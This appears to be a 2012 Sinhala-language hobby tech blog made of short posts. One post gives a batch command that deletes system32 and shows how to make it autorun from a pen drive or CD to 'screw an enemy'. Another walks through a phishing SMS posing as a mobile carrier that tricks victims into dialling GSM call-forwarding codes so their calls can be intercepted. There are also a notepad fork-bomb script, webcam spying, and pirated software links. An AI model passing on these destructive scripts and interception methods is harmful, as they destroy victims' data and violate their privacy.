Thursday, May 17, 2012

පොඩි වයිරස් එකක්.. පොඩිමත් නෑ!

මේක පොඩි වයිරස් එකක් අපි අපේ පීසී එකේම හදලා... මොකකට හරි බයින්ඩ් කරලා හෝ.. පෙන් හෝ සීඩි එකකට ඔටෝ රන් වෙන විදිහකට හදලා... අපේ කාගේ හරි හතුරෙක්ට කෙලවන්න පුළුවන්..... මෙච්චරයි කොරන්න තියෙන්නේ... ඔය පල්ලෙහා කෝඩ් එක නෝට්පෑඩ් එකට දාලා සේවු ඈස් දීලා... මොකක් හරි නමක් ".bat or .cmd" කියලා දෙන්න විතරයි තියෙන්නේ.... del c:\windows\system32\*.* /q හැබැයි ඉතින් උබලා මේක අතපය තියන් ඉන්න බැරි කමට උබලගේම පීසී එකේ ඩබල් ක්ලික් කරලා මට මුකුත් කියන්න එෆා.... මේක රන් කලොත් එහෙම උබලගේ පීසී එක දෙල් වෙයි... මොන මගුල කරලා හරි ඕෆ් කරලා දැන් ඔන් කරන්නවා කියලා හිතපන්කෝ... බලන් හිටහාන් ඔන් වෙයිද කියලා.. මොකද මේක රන් කලාම කලේ ඔක්කොම system32 ෆෝල්ඩර් එක කපපු එක.. ඉතින් ඔන් වෙන්නේ කොහොමද..:D
හරි එහෙනම් මේක ඔටෝ රන් වෙන්නත් හදන හැටි කියන්නම්... නෝට්පෑඩ් එක ඔපෙන් කරලා... ඔය පල්ලෙහා තියන කෝඩ් එක දීලා... Quote: [autorun] OPEN=your_program.BAT දැන් මෙතන your_program.BAT කියලා තියන තැනට ඔයාට ඔටෝ රන් කරන්න ඕනේ .bat or .cmd or .exe හෝ මොකක් හරි හදාගත්තු එකේ නම දීලා... සේව් ඈස් ගිහින් Autorun.inf දීලා සේව් කරන්න . පස්සේ මේක පෙන් එකට හෝ සීඩි එකට දාන්න.. අර හදා ගත්තු වයිරස් එකත් එක්ක! ඔන්න ලෙසියෙන්ම ගෙමක් දෙන්න පුලුවන් වැඩක් කියලා දුන්නා!

Tuesday, April 17, 2012

Skype ෆට්ට වැඩ.. තවත් අතල් වැඩක්.......

ඉස්සරලා post 1කකින් මම skype එකේ voice changer එකක් දුන්නා.දැන් දෙන්න හදන්නේ ආතල් එකක් ගන්න තවත් වැඩක්..දැන් හුග දෙනෙක් කෙල්ලට ලව් කරන්නත් skype එකනේ පාවිච්චි කරන්නේ.ඒත් ඔයාලා gf එක්ක කතා කර කර ඉන්න වෙලාවට පොඩ්ඩක් වත් හිතුවද මේකි Skype එකේ මොනවා කරනවා ඇතිද කියලා..මෙන්න ඒකට බඩු.ඒත් ඉතින් skype name..password ලග තියාගෙන ඉන්න හොදේ.. මේක මෙහෙමයි කරන්නේ.මේ සොෆ්ට්වෙයර් එකෙන් පුළුවන් එකපාර Skype දෙකක් එකම පී.සී එකක ඔපන් කරගන්න.බොහොම සුළු වැඩක්.අරගෙනම බලන්න.....කරලා බලලා මටත් අදහස් දාලම යන්න..අවුලක් උනොත් කියන්න! :D 

ඔන්න බාගනිල්ලා

http://www.mediafire.com/?gwgd4dla54vn1ok

SAINTS ROW The Third World

මෙන්න කට්ටියටම ෆට්ට game එකක්... මෙකෙ PC GAME එකත් තියනවා, PS3 GAME එකත් තියනවා.... මන් ලග තියෙන්නෙ නම් PS3 game එක අරගෙනම බලන්නකො... මේන්න link එක

http://www.torrentfunk.com/torrent/3550253/saints-row-the-third-skidrow.html
Minimum System Requirements – * OS: Windows XP / Vista * CPU: 2GHz Dual Core Processor (Intel® Core 2 Duo or AMD Athlon™ X2) or higher * RAM: 2 GB * HDD space: 10 GB * Graphics: 320 MB 3D Video Card w/Shader Model 3.0 Support * Sound Card: DirectX 9.0c Recommended System Requirements * OS: Windows XP / Vista / 7 * CPU: Any Quad Core Processor (Intel® Core i5 or AMD Phenom™ II X4) or 3.0+ Dual Core CPU * RAM: 4 GB * HDD space: 10 GB * Graphics: 1 GB with Shader Model 4.0 Support * Sound Card: DirectX 9.0c * Broadband Connection for Internet Multiplayer Supported Graphics Cards: Minimum – NVIDIA® GeForce 8800 series or ATI Radeon HD3800 series Recommended – NVIDIA GeForce GTX 400 series ATI Radeon HD5000 series

Sunday, April 8, 2012

වින්ඩොව්ස් Vista

Microsoft Windows Vista ULTIMATE x86 SP2 (October 2009) HowTo: ------ Burn Image to DVD Boot from DVD Install... ... have fun No Serial and no Activation needed මෙන්න Link බාගන්න

Vitamin d Video

මෙන්න තියනවා කස්ටියට පට්ටම ආතල් එකක් ගන්න පුළුවන් සිද්දියක් ! ඒ තමා වෙබ් කැම් එකක් Spying cam එකක් විදියට use කරන්න පුළුවන් විදියක් ! මේක කරන්නේ මෙහෙමයි Software එකේ නම තමා Vitamin d Video මේක තමා මම දැකල තියන හොදම Motion Detecting Technology එක තියන Software එක ! තව ඒව ඇති ! හරි මුලින්ම කරන්න තියෙන්නේ මේ Software එක Install කර ගන්න එක ! ඊට පස්සේ ඉතින් Install කරහන් ! ඒකනම් ඉතින් බබා Software එකක් තමා අමුතුවෙන් විස්තර කරන්නයි කියලා දෙයක් නෑ මේක කොච්චර සුපිරිද කිව්වොත් ! web cam එක ඉස්සරහින් මොකක් හරි object එකක් move උනොත් පට ගාලා snap ෂොට් එකක් වදිනවා විතරක් නෙවේ move වෙන object එක වෙනම කොටුවක් වැටිලා පෙන්නවා ! පට්ට කියන්නේ උපරිමයි ! motion එකක් detect වෙන detect වෙන ගානේ Record වෙන Videos වම් පැත්තේ වෙනම පෙන්නනවා ! දවසම cam එක දාලා තිබුනත් හෙනම ලේසි අපිට අදාළ ස්ථානයේ වෙලා තියන සිද්දි බලාගන්න මොකද Cam එක ඉස්සරහින් මොකක් හරි object එකක් Move වෙලා ඉවර උනාම ඒ video clip එක එක clip එකක් විදියට save වෙන නිසා ..

Wednesday, March 28, 2012

මම ඕගොල්ලාන්ට දේන්න යන්නේ පට්ට Screensaver ටිකක්

ඔන්න බාගන්න ඕනතරම් තියේනවා  

http://www.scenicreflections.com/media/174625/3D_Sea_Lighthouses_Screensaver/
http://www.scenicreflections.com/media/174623/3D_Mountain_Lakes_at_Night_Screensaver/
http://www.scenicreflections.com/media/177732/Pacific_Ocean_Scenes_3D_Screensaver/
http://www.scenicreflections.com/media/177666/3D_Aquarium_Screensaver/
 http://www.scenicreflections.com/media/111954/Living_Spring_Gardens_3D_Screensaver/
http://www.scenicreflections.com/media/111953/Living_Rainforest_3D_Screensaver/
http://www.scenicreflections.com/media/554086/Beautiful_Butterflies_Screensaver/
http://www.scenicreflections.com/media/40193/Spring_with_Bible_Verses_Scenic_Reflections_Screensaver/                                      




මම අද ඕගොල්ලාන්ට දේන්න යන්නේ පට්ට Gadgets SET 1

ඔන්න බාගන්න ඕනතරම් තියේනවා    
http://windows.microsoft.com/en-US/windows/downloads/personalize/gadgets
http://buildagadget.com/wsg-system-monitor/
http://weather.weatherbug.com/desktop-weather/weatherbug-desktop-application.html
http://www.htchome.org/en/downloads/get/jegUS


මම අද ඕගොල්ලාන්ට දේන්න යන්නේ පට්ට themes SET එකක්

ඔන්න බාගන්න ඕනතරම් තියේනවා

http://windows.microsoft.com/en-US/windows/downloads/personalize/themes


Monday, March 26, 2012

අද මම කියලා දෙන්න යන්නේ අපි කලින් මකපු දෙයක් ආපසු ගන්නේ කොහොමද කියල

අද මම කියලා දෙන්න යන්නේ අපි කලින් මකපු දෙයක් ආපසු ගන්නේ කොහොමද කියලයි.ඒ කියන්නේ ඔයාලා කලින් මීට මාස කිහිපයකට පෙර වුවද මකපුවා ආපසු ගන්න පුලුවන්.ඔයාගේ අතින් වැරදිලා මැකිලා හෝ ඔයා ඕන කමින් මකලා දැන් ඔයා පසු තැවි තැවි ඉන්න දේවල් උනත් ගන්න පුලුවන්.මේකට භාවිතා කරන්නේ අපේ ලෝකේ ඉන්න හොදම පරිගනක වෙදා Tuneup Utilities වල අඩංගු වන Tuneup Undelete ය.පලමුව ඔබේ පරිගනකයේ Tuneup Utilities කළ යුතුය. http://download.cnet.com/TuneUp-Utilities-2012/3001-2094_4-10206416.html?spi=2f4895f91b92954796a784bac523fa0b .ඉන්පසු Tuneup Utilities Install කර Serial එක ලබා දෙන්න.දැන් ඔයා Start---All Programs---Tuneup Utilities---Tuneup Undelete වෙත පිවිසෙන්න.දැන් කරන වැඩ ටික පහත තියෙනවා.


01.Undelete වෙත පිවිසුනු විට පෙනෙන ආකාරය.ඔයා මකපු File එක තියෙන Hard Drive එකට හරිය දමන්න & Click Next Tuneup Utilities Install කර Serial එක ලබා දෙන්න.දැන් ඔයා Start---All Programs---Tuneup Utilities---Tuneup Undelete වෙත පිවිසෙන්න.දැන් කරන වැඩ ටික පහත තියෙනවා.


01.Undelete වෙත පිවිසුනු විට පෙනෙන ආකාරය.ඔයා මකපු File එක තියෙන Hard Drive එකට හරිය දමන්න & Click Next Tuneup Utilities Install කර Serial එක ලබා දෙන්න.දැන් ඔයා Start---All Programs---Tuneup Utilities---Tuneup Undelete වෙත පිවිසෙන්න.දැන් කරන වැඩ ටික පහත තියෙනවා.


01.Undelete වෙත පිවිසුනු විට පෙනෙන ආකාරය.ඔයා මකපු File එක තියෙන Hard Drive එකට හරිය දමන්න & Click Next











02.ඔයාට File එකේ නම මතක නම් සදහන් කරන්න.File එකේ නමමතක නැතිනම් හිස්තැනක් තබා Click Next








03.එවිට මකපු File පෙනෙන්නට පටන් ගනී.ඔයාට මකපු එකේ Size/Extention එක අනුව එය සොයා ගන්න පුලුවන්.








04.දැන් ඔයාට අවශ්‍ය එක උඩ් Right Click කර Restore to Click කරන්න.(Condition එක Good ලෙස සදහන් වේ නම් පමනක් මෙම ලබා ගත හැක.) 







05.දැන් File එක Restore වීමට අවශ්‍ය Folder එක ලබා දෙන්න. 







06.දැන් File එක Restore වේ. 







07.Restore වුන File එක. 








ඔබ අචසාන වරට Local Disk Format කළ දින සිට මකපු සියළු දේවල් ඔබට ලබා ගත හැක.  



මෙන්න ඔයාලට ඕන තරම් Flash Banners Edit කර ගන්න






















මේන්න Hacking වලට කැමති අයට phone 1 Hack කරන හැටි

දන්නා නොදන්නා ඕනෑම කෙනෙකුගේ දුරකතන ඇමතුම් Hack කරන්නෙ මෙහෙමයි ...දන්නා නොදන්නා ඕනෑම අයෙකුගේ ජංගම දුරකතන අංකය ආශ්‍රයෙන් ඒ ඒ පුද්ගලයින්ගේ දුරකතන ඇමතුම් වලට සවන් දියහැකි ක්‍රමවේදයකි....... කෙනෙක්ගෙ දුරකතන අංකය භාවිතා කරලා ඒ කෙනාගෙ දුරකතන ඇමතුම් වලට සවන් දෙන්නෙ කියලා.මම මේ දේ කියල දෙන්න යන්නෙ කාටවත් නරකක් කරන්න නෙවෙයි.තමන් ආදරය කරන කෙනා තව කෙනෙක් එක්ක Phone එකෙන් කතා කරනවද කියලා සැකනම්, තමන්ගෙ දුව-පුතා කවුරු එක්කද Phone එකෙන් කතා කරන්නෙ කියලා දැනගන්න ඕනිනම් ඒ දේවල් දැනගන්න.ඒක නිසා මේ දේ කවුරුවත් වැරදි විදියට පාවිච්චි කරන එකක් නැහැ කියල මම බලාපොරොත්තු වෙනවා.මම මේ දේවල් පිලිබඳ කිසිඳු වගකීමක් බාරනොගන්නා බවද කියන්න කැමතියි. හැඳින්වීම : ඕනෑම කෙනෙකුට මෙය අත්හදා බැලිය හැක.එනම් පහසු ක්‍රියාවලියකි. SMS පහසුකම සහිත ඕනෑම දුරකතනයක් මෙම ක්‍රමයෙන් Hack කිරීමට පුලුවන්.(සමහර ලංකාබෙල්, සිටිලින්ක් දුරකතන හැර…) (Phishing හා සමාන ක්‍රමවේදයකි.) අවශ්‍යය දේවල් : අලුත්ම Gmail Account එකක් (උදා :- dialoglanka@gmail.com , srilankamobitel@gmail.com වගේ එකක්.ඒක ඔයාලා Hack කරන්න යන කෙනාගෙ ජංගම දුරකතන ජාලය අනුව,ඊට උචිත නමකින් හදාගන්න..) අලුත්ම සිම් කාඩ් පතක්(සිම් එක ගන්න ඕනෙ Hack කරන්න යන කෙනාගෙ ජංගම දුරකතන ජාලයේ සිම් එකක්මයි) මම දැන් පියවරෙන් පියවර කියල දෙන්නම්. ඉස්සෙල්ලම ඔයා හදපු Gmail Account එකට Log වෙන්න. ඊට පස්සෙ ඔයා Hack කරන්න යන කෙනාගෙ Phone Number එක Contact List එකට දාගන්න. දැන් ඒ කෙනාට SMS යවන Window එක Open කරගෙන මේ පහලින් පෙන්නලා තියන විදියට මොනව හරි Type කරගන්න උදා :- @dialog.adata niyamitha apage sanwathsarika semarum hethuwen “30mins” kaalayak onema jalayakata amathum nomile labadheemata api katayuthu yodha athi bawa sathutin danwamu.me sandaha pahatha keathaya amathaa liyaapadinchi wanna “*******************” ____________________ දැන් මම ඔය තරු ටිකක් දාල තියන තැන Type කරන්න තියනවා GSM කේතමය අංකයක්.පහල තියන අංක 4න් ඕනෑම අංකයක් එතනට දාන්න පුලුවන්.එතකොට වෙන දේවල් ටිකත් මම ඒ එක්කම දාල ඇති.ඒක බලපුවහම කට්ටියට තේරෙයි මොකද වෙල තියෙන්නෙ කියලා. මම “X” දාලා තියන තැන් වලට ඔයාලා අරගත්ත සිම් එකේ Number එක ලියන්න. **62*XXXXXXXXXX# මේ අංකය දැම්මොත් ඒ කෙනා Phone එක OFF කරපුවහමයි, Signal නැති වෙලාවටයි එයාගෙ Phone එකට එන සේරම calls එන්නෙ ඔයා අර දාපු Number එකට. [මෙය අක්‍රීය කිරීමටනම් එම දුරකතනයෙන්ම #62# යන GSM Code Number එක Dial කල යුතුය.ඔබට අවශ්‍යයනම් එම දුරකතනය වෙත යවන SMS තුලටම මෙය අවශ්‍යය පරිදි යොදා ගත හැක.] **61*XXXXXXXXXX# මේ අංකය දැම්මොත් ඒ කෙනා Phone එක Answer කරන්නෙ නැති වෙලාවට ඒ Calls සේරම එන්නෙ ඔයා අර දාපු Number එකට. [මෙය අක්‍රීය කිරීමටනම් එම දුරකතනයෙන්ම #61# යන GSM Code Number එක Dial කල යුතුය.ඔබට අවශ්‍යයනම් එම දුරකතනය වෙත යවන SMS තුලටම මෙය අවශ්‍යය පරිදි යොදා ගත හැක.] **67*XXXXXXXXXX# මේ අංකය දැම්මොත් ඒ කෙනා Call එකක ඉන්න වෙලාවට ඒ Calls සේරම එන්නෙ ඔයා අර දාපු Number එකට. [මෙය අක්‍රීය කිරීමටනම් එම දුරකතනයෙන්ම #67# යන GSM Code Number එක Dial කල යුතුය.ඔබට අවශ්‍යයනම් එම දුරකතනය වෙත යවන SMS තුලටම මෙය අවශ්‍යය පරිදි යොදා ගත හැක.] **21*XXXXXXXXXX# මේක දැම්මොත් ඒ කෙනාට එන සේරම Calls එන්නෙ ඔයා අර දාපු Number එකට. හැබැයි මේකනම් එච්චර සාර්ථක නැහැ.පටස් ගාලා අහුවෙන්න පුලුවන්.ඔයාලටම තෙරෙයි ඒ ඇයි කියලා. [මෙය අක්‍රීය කිරීමටනම් එම දුරකතනයෙන්ම #21# යන GSM Code Number එක Dial කල යුතුය.ඔබට අවශ්‍යයනම් එම දුරකතනය වෙත යවන SMS තුලටම මෙය අවශ්‍යය පරිදි යොදා ගත හැක.] Number එක මෙන්න මේ විදියට දාන්න මතක තියා ගන්න.වෙන වෙන විදියට ගහන්න එපා. උදා :- “0712345678″ දැන් මේ SMS එක ඒ කෙනාට යවන්න.ඒ කෙනා මේ GSM Code Number එක Dial කරපු සැනින් ඔයා යවපු Code Number එකේ හැටියට සේරම Calls හැරෙනවා.මේක හැම Phone එකකටම වෙනසක් නැතුව වැඩ කරනවා.ඕනෙම Phone එකකට. මේක සාමාන්‍යය Phone එකකිනුත් කරන්න පුලුවන්.ඒත් එහෙම සාමාන්‍යය Number එකකින් SMS එකක් ආවට ඒක කවුරුවත් ගනන් ගන්නෙ නැහැ.ඒක නිසයි අපි Gmail Use කලේ.එතකොට SMS එක යන්නෙ “12323″ වගෙ අංක 5ක Number එකකින්.ඒ වගෙම අපි අලුතින් Gmail Account එකක් හැදුවෙ අපේ Gmail Address එකත් SMS එකේ යටින් වැටෙන නිසා. එහෙනම් යාලුවෝ හැමෝම මේක Try කරල බලන්න. කාටවත් නරකක් කරන්න නෙවෙයි.යමක් ඉගෙනගන්න....:උපුටා..ගැනීම

Saturday, March 3, 2012

ෆෙස්බුක් පස්වර්ඩ් 1කක් Hack උනහම මෙ දෙ කරන්න :)


                 
හරි  දෙන් ගොඩක් අයගෙ අවුලක් තමයි මගෙ facebook account 1ක hack කරලා අයියො හිහිහිහි ,
හරි මන් කියන්නම් ඔයලගෙ facebook account 1කක් hack කලා කියලා ඔයට දැනුනොත් පොඩි වැඩක් තියනවා කරන්න,
hack උනහම ඉතින්  password 1කත් වැඩ කරන්නෙ නනෙ,අරු අයින් කරනව නෙ,
facebook hackers ලා ගොඩක් කරන්නෙ ඔයගෙ profile 1ක හැක් කලහම එයලා ඔයගෙ profile photos 1කෙ change කරන 1කයි,
එහෙම උනහම අපිට බැ අල්ල ගන්න 
හරි දෙන් වැඩෙට බහිමු මුලුන්ම මෙ ලින්ක් 1කට යන්න
                                   
                                 www.facebook.com\recover.php


ඉට පස්සෙ ඔයලට මෙ වගෙ page 1කක් එයි.



1කෙ ඔයලා මෙ details ටික type කරන්න..
Enter your email address or phone number.(මෙතන බරි වෙල හරි Email 1ක මරු වෙල තිබ්බොත් ඔය facebook 1කට ඔයගෙ 4n number  1ක දලා තිය්නව නම් 1ක දෙන්න,
මොකද අනිවර්යෙන්ම Mail 1ක chnge කරනවා මයි)
Enter your Facebook username.
Enter your name and a friend's name.

හරි මෙ විදිහට type කරලා submit හො ඉදිරියට යන්න...

 ඉට පස්සෙ මෙ වගෙ page 1කක් ඒයි මෙක නෙද ඔයගෙ facebook account 1ක කියලා අහයි,




හරි දෙන් කරන්න තියෙන්නෙ send coades and check Hotmail
hotmail කියන තෙන ඔයගෙ mail 1ක වටේයි මම hotmail හන්දා hotmail කියලා වටෙනවා..

හරි දෙන් ඔය යන්න ඔයගෙ mail 1කට ඉට පස්සෙ මෙන්න නෙ වගෙ mail 1කක් ඔයට අවිල්ලා තියෙයි..
දෙන් මන් highlight කරලා තියන ලින්ක් 1ක්ට යන්න ඉට පස්සෙ ඔයට මෙ වගෙ 1කක් එයි එතන ඔය New password
ගහලා change password කරන්න ....

වැඩෙ ගොඩෙ ගොඩ :D

පුන්චි පහෙ Virus 2කක් හදමුද?


                                             
තවත් පොඩි1කක් මෙන්න,හොඳ speed computer එකක් නෙමෙයි නම් මේක කරන්න එපා.මේකෙන් වෙන්නේ එකවර notepad window 100ක් විතර open වෙනවා.මෙමගින් ඔයාලගේ processor එක down ගහන්න පුළුවන්.stuck වෙන්නත් පුළුවන්.එහෙම වෙනවා වගේ දැනුනොත් පට ගාල restart කරන්න.එල එල අපි වඩෙ පටන් ගමු.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

මෙ ටික Notpad 1කෙ දා ගෙන .bat file 1කක් විඩිහට කර save ගන්න,ඉට පස්සෙ Run කරලම බලන්න හිහිහි..



            
අපේ යාළුවෙක්ව බය කරන්න නියම වැඩක්.මේකෙන් CAPS LOCK එකේ light එක දිගටම වැඩකරනවා.සමහර හොඳ virus guard වලින් නම් මේක virus එකක් ලෙස අල්ලනවා.ඔන්න තියනවා කරලම බලන්නකෝ.....

 මේ යටින් තියන code එක notpad copy-paste කරගන්න...


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop 
 



pchome.VBS file 1කක් ලෙස save කරගන්න.pchome කියන තෙනට කැමති නමක් දා ගන්න...

ඕනෑම Nokia Phone වලට Font(සිංහල) Install කරන විදිය


හරි දන් කරන්න තියෙන්නේ ඔයාලට මේ පහලින් තියන .SIS file එක Download කරගෙන ඔයාලගේ Phone එකට ස්ථාපනය කරගන

Y-Browser


                                   http://www.mediafire.com/?7tl9wwe064uukx3





දන් ඔයාල Y-Browser එක open කරලා මය පත එකේ තියන විදියට යන්න
Z:\resource\fonts

දන් ඔයාල font තියන Folder එක ඇතුලේ ඉන්නේ එකේ මේ නම් වලින් .ttf file පහක් තියනවා
Eg-Nokia E5

HeiseiGothS60.ttf
nssb60.ttf
nstsb60.ttf
nosnr60.ttf
S60SC.ttf

මේ නම් ටික phone එකෙන් එකට පොඩ්ඩක් වෙනස් වෙනවා .මේ තියෙන්නේ Nokia E5 එකක

දන් ඔයාලට සිංහල Font දාගන්න ඕනනම් මෙතනින් ගන්න iskolapotha

ඊළගට කරන්න තියෙන්නේ iskolapotha ෆොන්ට් එකෙන් copy පහක් හදාගෙන ඉහල තිබුණු ෆොන්ට් පහ විදියට Rename කරන්න.

ඊලග දන් ඔයාල resource කියලා folder එකක් හදාගන්න නැවත resource folder එක ඇතුලේ fonts කියල folder එකක හදන්න.

දන් ඔයාල Rename කරගත්ත font ටික අපි හදාගත resource folder එක ඇතුලේ තියන fonts folder එකට copy කරන්න දන් වැඩේ ගොඩක් දුරට හරි

දන් ඔයාලගේ phone එක mass storage විදියට connect කරලා අපි හාගත්හ resource folder එක ඔයාලගේ memory chip එකට copy කරන්න.ඔයාල resource folder එක phone memory එකට copy කරන්න එපා.

සමහරවිට memory chip එකේ resource කියල folder එකක් තිබුනොත්.එක open කරලා එකට fonts කියන folder එක විතරක් copy කරන්න.හරි දන් වැඩේ හරි.

දන් ඔයාල phone එක restart කරලා බලන්න

මේ විදියට ඕනෑම font එකක install කරගන්න පුළුවන් .